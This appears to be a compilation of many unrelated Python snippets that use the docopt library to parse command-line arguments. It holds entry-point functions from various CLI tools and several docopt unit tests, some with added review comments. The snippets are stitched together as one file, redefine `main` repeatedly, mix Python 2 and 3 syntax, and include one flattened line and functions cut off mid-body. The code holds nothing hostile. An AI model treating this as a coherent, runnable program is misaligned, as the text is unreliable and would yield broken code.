def main(argv=None):
    """clipon entry point: parse the global command line and dispatch to
    the matching ``do_<command>`` handler.

    :param argv: argument list without the program name; defaults to
        ``sys.argv[1:]`` (note: an explicitly-passed empty list also falls
        back to ``sys.argv[1:]`` -- preserved from the original).
    """
    # parse the command line
    args = docopt(main_doc, version='clipon version %s' % __version__,
                  options_first=True, argv=argv or sys.argv[1:])
    cmd = args['<command>']
    argv = [args['<command>']] + args['<options>']
    if cmd == 'help':
        do_help(argv)
        return
    # Resolve the sub-command docstring and handler *before* dispatching.
    # In the original, the handler call itself sat inside this try, so a
    # KeyError/AssertionError raised by the handler was misreported as
    # "not a clipon command".
    try:
        # parse the options for subcommand
        cmd_doc = globals()[cmd + '_doc']
        # locate the subcommand handler
        method = globals()['do_' + cmd]
        assert callable(method)
    except (KeyError, AssertionError):
        exit("%r is not a clipon command. See 'clipon help or clipon -h'." % cmd)
    args = docopt(cmd_doc, argv)
    # call the subcommand handler; its own exceptions now propagate
    method(args)
def main(argv=None, testing=False):
    """ Entry point """
    # NOTE(review): falls back to the *full* sys.argv (program name
    # included); docopt is conventionally given sys.argv[1:] -- confirm.
    argv = argv or sys.argv
    opts = docopt.docopt(__doc__, argv)
    if opts['-d']:
        # drop into the debugger on request
        pdb.set_trace()
    if opts['-b']:
        # binary (IEC) units: powers of 1024
        divisor = 1024
        units = ['b', 'Kib', 'Mib', 'Gib', 'Tib', 'Pib', 'Eib', 'Zib', 'Yib']
    else:
        # decimal (SI) units: powers of 1000
        divisor = 1000
        units = ['b', 'Kb', 'Mb', 'Gb', 'Tb', 'Pb', 'Eb', 'Zb', 'Yb']
    # reversed so pop() yields the smallest unit first
    units.reverse()
    if len(argv) < 1:
        rval = usage()
    try:
        # divide down until the value fits below one divisor step
        # NOTE(review): a large enough value exhausts `units` and pop()
        # raises IndexError -- confirm acceptable
        val = float(opts['NUMBER'])
        unit = units.pop()
        while divisor <= val:
            val /= divisor
            unit = units.pop()
        rval = "{} = {:3.2f} {}".format(opts['NUMBER'], val, unit)
    except ValueError:
        # non-numeric NUMBER: re-parse with an invalid flag so docopt
        # prints usage and exits
        # NOTE(review): if docopt does not exit here, `rval` may be
        # unbound below -- confirm
        _ = docopt.docopt(__doc__, ["-x"])  # noqa: ignore=F841
    if testing:
        return(rval)
    else:
        print(rval)
def main():
    """
    Create a client, parse the arguments received on the command line, and
    call the appropriate method on the client.
    """
    cli = DeisClient()
    # options_first=True leaves sub-command options unparsed for later
    args = docopt(__doc__, version='Deis CLI {}'.format(__version__),
                  options_first=True)
    cmd = args['<command>']
    cmd, help_flag = parse_args(cmd)
    # print help if it was asked for
    if help_flag:
        if cmd != 'help':
            if cmd in dir(cli):
                # show the sub-command's own docstring as its help text
                print trim(getattr(cli, cmd).__doc__)
                return
        # fall back to the top-level usage (docopt exits after printing)
        docopt(__doc__, argv=['--help'])
    # re-parse docopt with the relevant docstring
    if cmd in dir(cli):
        docstring = trim(getattr(cli, cmd).__doc__)
        if 'Usage: ' in docstring:
            args.update(docopt(docstring))
    # find the method for dispatching
    if hasattr(cli, cmd):
        method = getattr(cli, cmd)
    else:
        raise DocoptExit('Found no matching command')
    # dispatch the CLI command
    try:
        method(args)
    except EnvironmentError:
        print 'Could not find git remote for deis'
        raise DocoptExit()
def load_args(args): parsed_docopt = docopt(__doc__, version='1.0') print parsed_docopt print "----------\n" if parsed_docopt['<git_cmd>'] == 'add': parsed_docopt = docopt(add_usage, parsed_docopt['--cmd_data']) print parsed_docopt
def main():
    """Felix Felicis (liquidluck) CLI: dispatch on the first argv token."""
    enable_pretty_logging()
    command = 'help'
    if len(sys.argv) > 1:
        command = sys.argv[1]
    # parse with the sub-command's own usage string when one exists
    if command in documentation:
        args = docopt(documentation[command])
    else:
        args = docopt(
            documentation['help'],
            version='Felix Felicis v%s' % liquidluck.__version__
        )
    if command == 'create':
        # scaffold a new settings file
        creator.create(args['--settings'] or 'settings.py')
    elif command == 'build':
        arg_settings = args['--settings'] or 'settings.py'
        if not os.path.exists(arg_settings):
            # offer to scaffold settings instead of failing outright
            answer = raw_input(
                "Can't find your setting files, "
                "would you like to create one?(Y/n) "
            )
            if answer.lower() == 'n':
                return
            creator.create(arg_settings)
        else:
            g.detail_logging = args['--verbose']
            generator.build(arg_settings)
    elif command == 'server':
        arg_settings = args['--settings'] or 'settings.py'
        arg_port = int(args['--port'] or 8000)
        if not os.path.exists(arg_settings):
            # still serve, but without site-specific configuration
            print('setting file not found')
            server.config(arg_port)
            server.start_server()
        else:
            generator.load_settings(arg_settings)
            # choose URL style from the configured permalink pattern
            if settings.permalink.endswith('.html'):
                permalink = 'html'
            elif settings.permalink.endswith('/'):
                permalink = 'slash'
            else:
                permalink = 'clean'
            server.config(arg_port, g.output_directory, permalink)
            server.start_server()
    elif command == 'search':
        arg_theme = args['<theme>'] or None
        arg_clean = args['--clean']
        arg_force = args['--force']
        theme.search(arg_theme, arg_clean, arg_force)
    elif command == 'install':
        arg_theme = args['<theme>'] or None
        theme.install(arg_theme)
    elif command == 'webhook':
        arg_settings = args['--settings'] or 'settings.py'
        arg_port = int(args['--port'] or 9000)
        # exactly one of start/stop/restart is expected to be truthy
        action = (args['start'] and 'start') or (args['stop'] and 'stop') \
            or (args['restart'] and 'restart')
        webhook.webhook(arg_port, action, arg_settings)
def main(argv=None):
    """Print the name of every available snapcraft plugin, with
    underscores rendered as dashes."""
    # validate flags (docopt exits on -h/--help); result is unused
    docopt(__doc__, argv=argv if argv else [])
    plugin_modules = pkgutil.iter_modules(snapcraft.plugins.__path__)
    for _finder, module_name, _is_pkg in plugin_modules:
        print(module_name.replace('_', '-'))
def main(argv=None):  # pragma: no cover
    """Installer entry point.

    :param argv: full argument vector including the program name;
        defaults to ``sys.argv`` (None-sentinel replaces the original
        mutable ``argv=sys.argv`` default, which was bound at import time).
    """
    if argv is None:
        argv = sys.argv
    # Command is executed in the main directory of the plugin, and we must
    # include it in the current path for the imports to work
    sys.path.insert(0, '.')
    # ensure that argv, are unique and the same type as doc string
    argv = ensure_unicoded_and_unique(argv)
    if len(argv) > 1:
        application = argv[1]
        application_module = __import__(application)
        # guard argv[2] access: the original raised IndexError when only
        # the application name was given
        wants_help = len(argv) > 2 and argv[2] == 'help'
        try:
            # by default docopt uses sys.argv[1:]; ensure correct args passed
            args = docopt(__doc__, argv=argv[1:],
                          version=application_module.__version__)
            if wants_help:
                raise DocoptExit()
        except DocoptExit:
            if wants_help:
                raise
            args = docopt(__doc__, argv[1:3],
                          version=application_module.__version__)
        args['--cms'] = '--cms' in argv
        for arg in argv:
            # split on the first '=' only so option values may contain '='
            if arg.startswith('--extra-settings='):
                args['--extra-settings'] = arg.split('=', 1)[1]
            if arg.startswith('--runner='):
                args['--runner'] = arg.split('=', 1)[1]
        args['options'] = [argv[0]] + argv[2:]
        # '--native' forces the test command through the non-docopt path
        if args['test'] and '--native' in args['options']:
            args['test'] = False
            args['<command>'] = 'test'
            args['options'].remove('--native')
        return core(args=args, application=application)
    else:
        args = docopt(__doc__, version=__version__)
def stream_cmd(argv=sys.argv[1:]):  # pragma: no cover
    """\
    Start the streaming server, which listens to stdin, processes line
    by line, and returns predictions.

    The input should consist of a list of json objects, where each object
    will result in a prediction.  Each line is processed in a batch.

    Example input (must be on a single line):

      [{"sepal length": 1.0, "sepal width": 1.1, "petal length": 0.7, "petal width": 5}, {"sepal length": 1.0, "sepal width": 8.0, "petal length": 1.4, "petal width": 5}]

    Example output:

      ["Iris-virginica","Iris-setosa"]

    An input line with the word 'exit' will quit the streaming server.

    Usage:
      pld-stream [options]

    Options:
      -h --help                  Show this screen.
    """
    # validate flags against the usage string above (docopt exits on
    # -h/--help); the parsed result itself is not needed
    docopt(stream_cmd.__doc__, argv=argv)
    # presumably loads the configuration PredictStream depends on -- confirm
    initialize_config()
    stream = PredictStream()
    # blocks, reading JSON lines from stdin and writing predictions to stdout
    stream.listen(sys.stdin, sys.stdout, sys.stderr)
def main(argv=None):
    """lymph CLI entry point; returns the sub-command's exit code."""
    # monkey-patching must happen before any other lymph import
    import lymph.monkey
    lymph.monkey.patch()

    import docopt

    from lymph import __version__ as VERSION
    from lymph.cli.help import HELP
    from lymph.cli.base import get_command_class

    # options_first leaves everything after <command> unparsed in <args>
    args = docopt.docopt(HELP, argv, version=VERSION, options_first=True)
    name = args.pop('<command>')
    argv = args.pop('<args>')
    try:
        command_cls = get_command_class(name)
    except KeyError:
        print("'%s' is not a valid lymph command. See 'lymph list' or 'lymph --help'." % name)
        return 1
    # re-parse with the sub-command's own usage string and merge results
    command_args = docopt.docopt(command_cls.get_help(), [name] + argv)
    args.update(command_args)
    config = setup_config(args) if command_cls.needs_config else None
    setup_logging(args, config)
    if config:
        # route container logs through the ZMQ publisher endpoint
        config.set('container.log_endpoint', zmqpub_log_handler.endpoint)
    terminal = setup_terminal(args, config)
    command = command_cls(args, config, terminal)
    return command.run()
def test_issue_65_evaluate_argv_when_called_not_when_imported():
    """docopt must read sys.argv at call time, not at import time.

    The original test overwrote the global sys.argv without restoring it,
    leaking state into every test that runs afterwards; restore it in a
    finally block.
    """
    import sys
    saved_argv = sys.argv
    try:
        sys.argv = "prog -a".split()
        assert docopt("usage: prog [-ab]") == {"-a": True, "-b": False}
        sys.argv = "prog -b".split()
        assert docopt("usage: prog [-ab]") == {"-a": False, "-b": True}
    finally:
        sys.argv = saved_argv
def test_default_value_for_positional_arguments():
    # disabled right now: [default: ...] on positionals is not honoured;
    # the trailing commented dicts record the intended (unimplemented)
    # behaviour
    assert docopt("usage: prog [<p>]\n\n<p> [default: x]", "") == {"<p>": None}  # {'<p>': 'x'}
    assert docopt("usage: prog [<p>]...\n\n<p> [default: x y]", "") == {"<p>": []}  # {'<p>': ['x', 'y']}
    # an explicit argument always wins over any default
    assert docopt("usage: prog [<p>]...\n\n<p> [default: x y]", "this") == {"<p>": ["this"]}
def main():
    """fct CLI entry point: dispatch <command> to a module-level handler."""
    # Let's print help be default
    options = docopt(__doc__,
                     argv=sys.argv[1:] if len(sys.argv) > 1 else ['--help'],
                     version=fc_toolbelt.__VERSION__)
    available_commands = ['boilerplate', 'config', 'git', 'gitlab', 'jenkins',
                          'join', 'redmine', 'tickets', 'update']
    command = options['<command>']
    # Load fabric defaults from ~/.fabricrc
    state.env.update(load_settings(state._rc_path()))
    # NOTE(review): `True or ...` makes this branch unconditional, so the
    # quieter else-branch below is dead code -- looks like leftover debug;
    # confirm intent before changing.
    if True or options['--verbose']:
        level = logging.DEBUG if options['--verbose'] else logging.INFO
        logger.addHandler(logging.StreamHandler())
        logger.setLevel(level)
    else:
        state.output['commands'] = False
        state.env.output_prefix = False
    if options['<command>'] in available_commands:
        # re-parse argv against the sub-command's own docstring
        subcommand = globals()[command]
        options = docopt(subcommand.__doc__, argv=sys.argv[1:])
        exit(subcommand(options))
    elif options['<command>'] == 'help':
        if not options['<args>']:
            exit(__doc__)
        help_command = options['<args>'][0]
        if help_command in available_commands:
            exit(textwrap.dedent(globals()[help_command].__doc__))
    exit("%r is not a fct command. See 'fct --help'." % command)
def test_command(self):
    """Command subclasses dispatch run() to the method named by argv."""
    doc = """Usage: command foo"""
    config = _fake_config
    # with no argv, docopt falls back to sys.argv, which cannot match
    with raises(DocoptExit):
        args = docopt(str(doc))

    class SmallCommand(Command):
        def __init__(self, config, args):
            self.config = config
            self.args = args
            self.manager = _manager(token=config['api_token'])

        def foo(self):
            print("foo-answer")

        def bar(self):
            print("bar-answer")

    # run() with docopt args dispatches to foo()
    with capture_stdout() as capture:
        output = SmallCommand(config, docopt(str(doc), argv=['foo'])).run()
    assert capture.result == "foo-answer\n"
    # run('bar') dispatches explicitly, bypassing parsed args
    with capture_stdout() as capture:
        output = SmallCommand(config, []).run("bar")
    assert capture.result == "bar-answer\n"
def run(self, argv=sys.argv):
    """
    usage: pwhash-config [-hv] <command> [<args>...]
           pwhash-config (-h | --help)
           pwhash-config (-v | --version)

    options:
      -h, --help     Shows this text
      -v, --version  Shows the version number.

    commands:
      create   Create pwhash application configuration
      compile  Compile application configuration for deployment
      upgrade  Upgraded pwhash application configuration
    """
    # the docstring above doubles as the docopt usage string; argv[0]
    # (program name) is stripped before parsing
    arguments = docopt(
        textwrap.dedent(self.run.__doc__),
        argv=argv[1:],
        options_first=True,
        version=textwrap.dedent(
            u"""\
            pwhash version: %s
            application config version: %d
            deployment config version: %d"""
        ) % (__version__, APPLICATION_VERSION, DEPLOYMENT_VERSION),
    )
    # forward the sub-command plus its raw args for a second docopt pass
    command_arguments = [arguments["<command>"]] + arguments["<args>"]
    command = self.commands.get(arguments["<command>"])
    if command is None:
        self.fail(u"%r is not a pwhash-config command" % arguments["<command>"])
    else:
        # parse again against the sub-command's own docstring, then run it
        command(docopt(textwrap.dedent(command.__doc__), argv=command_arguments))
def main(argv=None):  # pragma: no cover
    """Installer entry point.

    :param argv: full argument vector including the program name;
        defaults to ``sys.argv`` (None-sentinel replaces the original
        ``argv=sys.argv`` default, which was bound once at import time).
    """
    if argv is None:
        argv = sys.argv
    # Command is executed in the main directory of the plugin, and we must
    # include it in the current path for the imports to work
    sys.path.insert(0, '.')
    if len(argv) > 1:
        application = argv[1]
        application_module = import_module(application)
        # guard argv[2] access: the original raised IndexError when only
        # the application name was given
        wants_help = len(argv) > 2 and argv[2] == 'help'
        try:
            args = docopt(__doc__, version=application_module.__version__)
            if wants_help:
                raise DocoptExit()
        except DocoptExit:
            if wants_help:
                raise
            args = docopt(__doc__, argv[1:3],
                          version=application_module.__version__)
        args['--cms'] = '--cms' in argv
        for arg in argv:
            # require the '=' form: the original matched a bare
            # '--extra-settings' and then crashed on split('=')[1];
            # split on the first '=' so values may contain '='
            if arg.startswith('--extra-settings='):
                args['--extra-settings'] = arg.split('=', 1)[1]
        args['options'] = [argv[0]] + argv[2:]
        # '--native' forces the test command through the non-docopt path
        if args['test'] and '--native' in args['options']:
            args['test'] = False
            args['<command>'] = 'test'
            args['options'].remove('--native')
        core(args=args, application=application)
    else:
        args = docopt(__doc__, version=__version__)
def main():
    """dokku-client entry point: resolve <command> and run its handler."""
    commands = load_commands()
    args = docopt(root_doc(), version='dokku-client version %s' % __version__,
                  options_first=True)
    command_name = args['<command>'] or 'help'
    if command_name == 'version':
        # docopt will handle version printing for us if use '--version'
        exit(call(['dokku-client', '--version']))
    # Get the command object for the specified command name
    command = command_by_name(command_name, commands)
    if not command:
        sys.stderr.write("Unknown command. Use 'dokku-client help' for list of commands.\n")
        exit(1)
    else:
        # Use docopt to parse the options based upon the class' doc string
        command_args = docopt(command.doc)
        # Load default values from the users' environment
        command_args = apply_defaults(command_args)
        if command.check_config:
            # Sanity check the config
            if not command_args.get('--host', None):
                sys.stderr.write("Could not determine host. Specify --host or set DOKKU_HOST.\n")
                exit(1)
            if not command_args.get('--app', None):
                sys.stderr.write("Could not determine app. Specify --app or set DOKKU_APP.\n")
                exit(1)
        # Ok, let's run the command
        command.args = command_args
        command.main()
def test_allow_double_dash():
    # '--' ends option parsing: everything after it is positional.
    # NOTE(review): 'kptions:'/'options:-o' look like typos for an
    # "options:" section, but they are part of the strings docopt parses,
    # so they are deliberately left untouched -- confirm upstream.
    assert docopt('usage: prog [-o] [--] <arg>\nkptions: -o', '-- -o') == {'-o': False, '<arg>': '-o', '--': True}
    assert docopt('usage: prog [-o] [--] <arg>\nkptions: -o', '-o 1') == {'-o': True, '<arg>': '1', '--': False}
    with raises(DocoptExit):  # "--" is not allowed; FIXME?
        docopt('usage: prog [-o] <arg>\noptions:-o', '-- -o')
def test_docopt():
    # single optional flag plus one required positional
    doc = '''Usage: prog [-v] A

    -v  Be verbose.'''
    assert docopt(doc, 'arg') == {'-v': False, 'A': 'arg'}
    assert docopt(doc, '-v arg') == {'-v': True, 'A': 'arg'}

    # multiple usage patterns: unmatched positionals default to None
    doc = """Usage: prog [-vqr] [FILE]
              prog INPUT OUTPUT
              prog --help

    Options:
      -v  print status messages
      -q  report only file names
      -r  show all occurrences of the same error
      --help

    """
    a = docopt(doc, '-v file.py')
    assert a == {'-v': True, '-q': False, '-r': False, '--help': False,
                 'FILE': 'file.py', 'INPUT': None, 'OUTPUT': None}
    a = docopt(doc, '-v')
    assert a == {'-v': True, '-q': False, '-r': False, '--help': False,
                 'FILE': None, 'INPUT': None, 'OUTPUT': None}
    with raises(DocoptExit):  # does not match
        docopt(doc, '-v input.py output.py')
    with raises(DocoptExit):
        docopt(doc, '--fake')
    # '--hel' prefix-matches '--help', which exits via SystemExit
    with raises(SystemExit):
        docopt(doc, '--hel')
def main():
    """CLI entrypoint, handles subcommand parsing.

    The try/except in the original wrapped ``command_mod.run(...)`` as
    well, so an ImportError raised *inside* a command module was
    misreported as "not a known dfm command"; the try is now narrowed to
    the import itself.
    """
    args = docopt(__doc__, version='dfm version 7.2.0', options_first=True)
    if not args['<command>']:
        print(__doc__)
        sys.exit(1)
    if args['--debug']:
        logging.basicConfig(level=logging.DEBUG)
    elif args['--verbose']:
        logging.basicConfig(level=logging.INFO)
    command = args['<command>']
    if command == 'help':
        if args['<args>']:
            # show the target command's module docstring as its help text
            help_cmd = ALIASES.get(args['<args>'][0], args['<args>'][0])
            try:
                command_mod = import_module('dfm.cli.{}_cmd'.format(help_cmd))
            except ImportError:
                print('{} is not a known dfm command.'.format(help_cmd))
                sys.exit(1)
            print(command_mod.__doc__)
        else:
            print(__doc__)
        sys.exit(0)
    command = ALIASES.get(command, command)
    try:
        command_mod = import_module('dfm.cli.{}_cmd'.format(command))
    except ImportError:
        print('{} is not a known dfm command.'.format(command))
        sys.exit(1)
    # re-parse with the sub-command's own docstring and dispatch
    argv = [command] + args['<args>']
    command_mod.run(docopt(command_mod.__doc__, argv=argv))
    sys.exit(0)
def test_allow_double_underscore():
    # '--' must be declared in the usage pattern to be accepted; when it
    # is, everything after it is treated as positional
    assert docopt('usage: prog [-o] [--] <arg>\n\n-o', '-- -o') == {'-o': False, '<arg>': '-o', '--': True}
    assert docopt('usage: prog [-o] [--] <arg>\n\n-o', '-o 1') == {'-o': True, '<arg>': '1', '--': False}
    with raises(DocoptExit):
        docopt('usage: prog [-o] <arg>\n\n-o', '-- -o')  # '--' not allowed
def test_show(self):
    """'show' command parses with and without the optional --f flag."""
    # bare 'show': flag defaults to False
    args = docopt(doc, ['show'])
    self.assertEqual(args['show'], True)
    self.assertEqual(args['--f'], False)
    # 'show --f': flag present
    args = docopt(doc, ['show', '--f'])
    self.assertEqual(args['show'], True)
    self.assertEqual(args['--f'], True)
def main():
    """repostack entry point: dispatch <command> to a RepoStack method."""
    import sys
    from textwrap import dedent
    from docopt import docopt
    args = docopt(__doc__, version=__version__, options_first=True)
    rootdir = '.'
    if args['--dir']:
        rootdir = args['--dir']
    command = args['<command>']
    if command == 'help':
        # NOTE(review): this assigns args['<args>'] (likely a list under
        # `<args>...`) to `command`, and a plain string to args['<args>'];
        # the later `[command] + args['<args>']` then mixes list and str
        # -- looks fragile, confirm against the usage string.
        command = args['<args>']
        args['<args>'] = '--help'
    try:
        repostack = RepoStack(rootdir=rootdir)
        if hasattr(repostack, command):
            # re-parse against the method's own docstring and call it
            cmd = getattr(repostack, command)
            cmd(docopt(
                dedent(cmd.__doc__),
                options_first=True,
                argv=[command] + args['<args>']))
        else:
            sys.exit('\n'.join((
                __doc__,
                'Error: unknown command "%s".' % command)))
    except Exception, e:
        print e
        raise
def test_options_first():
    # by default, options may appear anywhere on the command line
    assert docopt("usage: prog [--opt] [<args>...]", "--opt this that") == {"--opt": True, "<args>": ["this", "that"]}
    assert docopt("usage: prog [--opt] [<args>...]", "this that --opt") == {"--opt": True, "<args>": ["this", "that"]}
    # with options_first=True, everything after the first positional is
    # collected verbatim into <args>, even option-looking tokens
    assert docopt("usage: prog [--opt] [<args>...]", "this that --opt", options_first=True) == {
        "--opt": False,
        "<args>": ["this", "that", "--opt"],
    }
def main(argv=None):
    """cosmic-ray entry point: parse global options and dispatch <command>.

    :param argv: argument list without the program name; defaults to
        ``sys.argv[1:]``.
    """
    if argv is None:
        argv = sys.argv[1:]
    configuration = docopt.docopt(
        OPTIONS, argv=argv, options_first=True, version='cosmic-ray v.2')
    if configuration['--verbose']:
        logging.basicConfig(level=logging.INFO)
        # NOTE: mutates the caller-supplied argv list in place
        argv.remove('--verbose')

    command = configuration['<command>']
    if command is None:
        # BUG FIX: the original wrote `command == 'help'` (a no-op
        # comparison), so a missing command fell through to the KeyError
        # handler and logged a spurious error before showing help.
        command = 'help'

    try:
        handler = COMMAND_HANDLER_MAP[command]
    except KeyError:
        LOG.error('"{}" is not a valid cosmic-ray command'.format(command))
        handler = handle_help
        argv = ['help']

    # re-parse against the handler's own docstring and run it
    sub_config = docopt.docopt(
        handler.__doc__, argv, version='cosmic-ray v.2')
    sys.exit(handler(sub_config))
def parse(self, argv=None):
    """
    Read the array of command line arguments and determine if the user is
    requesting info about the pipeline or just wants to run the pipeline
    or wants to do something else.
    """
    argv = argv if argv else sys.argv[1:]
    try:
        args = docopt(self.usage_string, argv=argv)
        if args["run"] and args["<pipeline.json>"]:
            # user requests info about the pipeline
            print self._make_pipeline_usage_string(args["<pipeline.json>"])
    except DocoptExit as e:
        # user is attempting to run the pipeline: the generic usage string
        # did not match, so re-parse with the pipeline-specific one
        if len(argv) > 2 and argv[0] == "run":
            args = docopt(self._make_pipeline_usage_string(argv[1]), argv=argv)
            # collect all --long options as pipeline inputs (dashes stripped)
            inputs = {}
            for i in args:
                if i.startswith('--'):
                    inputs[i[2:]] = args[i]
            graph = JobGraph.from_pipeline(self._load_pipeline(argv[1]))
            try:
                graph.simple_run(RUNNER_MAP, inputs,
                                 before_job=before_job,
                                 after_job=after_job)
            except RunFailed, e:
                print 'Failed: %s' % e
                raise e
            finally:
                # always report whatever outputs were produced
                present_outputs(graph.get_outputs())
def main():
    """dominator entry point: resolve <command> to a module-level function
    marked with `iscommand`, load the container config, and invoke it.

    The original used two bare ``except:`` clauses, which also swallowed
    SystemExit and KeyboardInterrupt; they are narrowed to ``Exception``.
    """
    args = docopt.docopt(__doc__, version=getversion(), options_first=True)
    command = args['<command>']
    argv = [command] + args['<args>']
    # dashes in command names map to underscores in function names
    commandfunc = getattr(sys.modules[__name__], command.replace('-', '_'), None)
    if not hasattr(commandfunc, 'iscommand'):
        exit("no such command, see 'dominator help'.")
    else:
        loglevel = getattr(logging, args['--loglevel'].upper())
        logging.basicConfig(level=loglevel)
        settings.load(args['--settings'])
        if args['--namespace']:
            settings['docker-namespace'] = args['--namespace']
        logging.config.dictConfig(settings.get('logging', {}))
        logging.disable(level=loglevel-1)
        try:
            # containers come either from a YAML file or a module function
            if args['--config'] is not None:
                containers = load_yaml(args['--config'])
            else:
                containers = load_module(args['--module'], args['--function'])
        except Exception:
            getlogger().exception("failed to load config")
            return
        commandargs = docopt.docopt(commandfunc.__doc__, argv=argv)

        def pythonize_arg(arg):
            # '--opt' -> 'opt', '<arg>' -> 'arg'
            return arg.replace('--', '').replace('<', '').replace('>', '')
        try:
            commandfunc(containers, **{pythonize_arg(k): v
                                       for k, v in commandargs.items()
                                       if k not in ['--help', command]})
        except Exception:
            getlogger(command=command).exception("failed to execute command")
            return
def main():
    """ Main function """
    try:
        name = indexfile.__name__
        version = indexfile.__version__
        log = indexfile.getLogger(__name__)

        # local variables
        index = None

        # load commands
        commands = load_commands()
        helpstr = __doc__ % (name, name) + get_commands_help(commands)

        # create validation schema: coerces '-'/'stdin' to sys.stdin and
        # file paths to open file handles
        sch = Schema({
            'index': Or(None,
                        And(Or('-', 'stdin'),
                            Use(lambda x: sys.stdin)),
                        open),
            Optional('format'): open,
            Optional('loglevel'): And(str,
                                      Use(str.lower),
                                      Or('error', 'warn', 'info', 'debug')),
            '<command>': Command(commands=commands),
            str: object
        })

        # parse args and remove dashes
        args = docopt(helpstr, version="%s v%s" % (name, version),
                      options_first=True)
        args = dict([(k.replace('-', ''), v) for k, v in args.iteritems()])

        # validate args
        args = sch.validate(args)

        # deal with 'help' command (docopt exits after printing usage)
        if args.get('<command>') == 'help':
            docopt(helpstr, version="%s v%s" % (name, version), argv=['--help'])

        # load the index and delegate command to the matching sub-module,
        # run as __main__ with the index injected into its globals
        config = load_config(os.getcwd(), args)
        indexfile.setLogLevel(config.get('loglevel'))
        index = open_index(config)
        command_ = get_command(args.get('<command>'), commands)
        argv = [name, command_] + args['<args>']
        sys.argv = argv
        module_ = "indexfile.cli.indexfile_%s" % command_
        runpy.run_module(module_,
                         run_name="__main__",
                         init_globals={'index': index,
                                       'command': '{0} {1}'.format(name, command_)})
    except KeyboardInterrupt, e:
        sys.exit(1)
def main():
    """CIRCexplorer entry point: dispatch on sys.argv[1], importing each
    sub-command module lazily so unused ones carry no import cost."""
    # parse command
    command_log = 'CIRCexplorer parameters: ' + ' '.join(sys.argv)
    if len(sys.argv) == 1:
        # no sub-command: show usage and exit
        sys.exit(help_doc)
    elif sys.argv[1] == '--version' or sys.argv[1] == '-v':
        sys.exit(__version__)
    elif sys.argv[1] == 'align':
        from . import align
        align.align(docopt(align.__doc__, version=__version__),
                    command=command_log, name='align')
    elif sys.argv[1] == 'parse':
        from . import parse
        parse.parse(docopt(parse.__doc__, version=__version__),
                    command=command_log, name='parse')
    elif sys.argv[1] == 'annotate':
        from . import annotate
        annotate.annotate(docopt(annotate.__doc__, version=__version__),
                          command=command_log, name='annotate')
    elif sys.argv[1] == 'assemble':
        from . import assemble
        assemble.assemble(docopt(assemble.__doc__, version=__version__),
                          command=command_log, name='assemble')
    elif sys.argv[1] == 'denovo':
        from . import denovo
        denovo.denovo(docopt(denovo.__doc__, version=__version__),
                      command=command_log, name='denovo')
    else:
        # unknown sub-command: show usage and exit
        sys.exit(help_doc)
def main(argv=None):
    """Forget credentials for Ubuntu One SSO."""
    # validate flags (docopt exits on -h/--help); result is unused
    docopt(__doc__, argv=argv if argv else [])
    logger.info('Clearing credentials for Ubuntu One SSO.')
    clear_config()
    logger.info('Credentials cleared.')
def test_any_options():
    """[options] in the usage pattern picks up flags from the options
    section; absent flags default to False."""
    doc = '''Usage: prog [options] A

    -q  Be quiet
    -v  Be verbose.'''
    cases = (
        ('arg', {'A': 'arg', '-v': False, '-q': False}),
        ('-v arg', {'A': 'arg', '-v': True, '-q': False}),
        ('-q arg', {'A': 'arg', '-v': False, '-q': True}),
    )
    for argv, expected in cases:
        assert docopt(doc, argv) == expected
"""Compressor. Usage: compressor.py compress <read_file> [-o <write_file>] [--lzw|--elias [--divergence <divergence>|--code <code>]] compressor.py decompress <read_file> [-o <write_file>] (--lzw|--elias --code <code>) Options: --help Show this screen. --version Show version. -o Specify output file. --lzw Use lzw algorithm. --elias Use elias codes. -d --divergence=<divergence> Specify characters distribution divergence. --code=<code> Specify elias code type. --hp Use hyper-threading for high performance. """ from docopt import docopt import execution if __name__ == '__main__': arguments = docopt(__doc__, version='Compressor 1.0') print(arguments) try: execution.execute(arguments) except Exception as e: print(e.args)
def get_files(path, extension='.wav'):
    """Recursively collect file paths under `path` ending in `extension`."""
    filenames = []
    for filename in glob.iglob(f'{path}/**/*{extension}', recursive=True):
        filenames += [filename]
    return filenames


def convert_file(path):
    """Load a wav file and return (mel spectrogram as float32,
    quantised integer samples).

    Relies on the module-level `dsp` and `hparams` set in the
    __main__ block below.
    """
    wav = dsp.load_wav(path, encode=False)
    mel = dsp.melspectrogram(wav)
    # map [-1, 1] float audio onto [0, 2**bits - 1] integer levels
    # NOTE(review): np.int is removed in NumPy >= 1.24; this will need
    # `int` or an explicit np.int64 on modern NumPy
    quant = (wav + 1.) * (2**hparams.bits - 1) / 2
    return mel.astype(np.float32), quant.astype(np.int)


if __name__ == "__main__":
    args = docopt(__doc__)
    in_dir = args["<in_dir>"]
    out_dir = args["<out_dir>"]
    num_workers = args["--num_workers"]
    # default the worker pool to one worker per CPU core
    num_workers = cpu_count() if num_workers is None else int(num_workers)
    preset = args["--preset"]
    if preset is not None:
        with open(preset) as f:
            hparams.parse_json(f.read())
    # Override hyper parameters
    hparams.parse(args["--hparams"])
    assert hparams.name == "WaveRNN"
    dsp = DSP(hparams)
    quant_path = os.path.join(out_dir, 'quant/')
def main():
    """liquidctl CLI: select devices, run the requested operation on each,
    and exit with the number of per-device errors."""
    args = docopt(__doc__)

    if args['--version']:
        print(_gen_version())
        sys.exit(0)

    # --debug implies --verbose; quiet mode also suppresses tracebacks
    if args['--debug']:
        args['--verbose'] = True
        logging.basicConfig(level=logging.DEBUG,
                            format='[%(levelname)s] %(name)s: %(message)s')
        _LOGGER.debug('running %s', _gen_version())
    elif args['--verbose']:
        logging.basicConfig(level=logging.INFO,
                            format='%(levelname)s: %(message)s')
    else:
        logging.basicConfig(level=logging.WARNING,
                            format='%(levelname)s: %(message)s')
        sys.tracebacklimit = 0

    opts = _make_opts(args)
    filter_count = sum(1 for opt in opts if opt in _FILTER_OPTIONS)
    device_id = None

    if not args['--device']:
        selected = list(find_liquidctl_devices(**opts))
    else:
        # --device indexes into the *unfiltered* device list, so filters
        # are stripped before enumerating
        device_id = int(args['--device'])
        no_filters = {
            opt: val
            for opt, val in opts.items() if opt not in _FILTER_OPTIONS
        }
        compat = list(find_liquidctl_devices(**no_filters))
        if device_id < 0 or device_id >= len(compat):
            raise SystemExit('Error: device ID out of bounds')
        if filter_count:
            # check that --device matches other filter criteria
            matched_devs = [
                dev.device for dev in find_liquidctl_devices(**opts)
            ]
            if compat[device_id].device not in matched_devs:
                raise SystemExit(
                    'Error: device ID does not match remaining selection criteria'
                )
            _LOGGER.warning(
                'mixing --device <id> with other filters is not recommended; '
                'to disambiguate between results prefer --pick <result>')
        selected = [compat[device_id]]

    if args['list']:
        _list_devices(selected, using_filters=bool(filter_count),
                      device_id=device_id, **opts)
        return

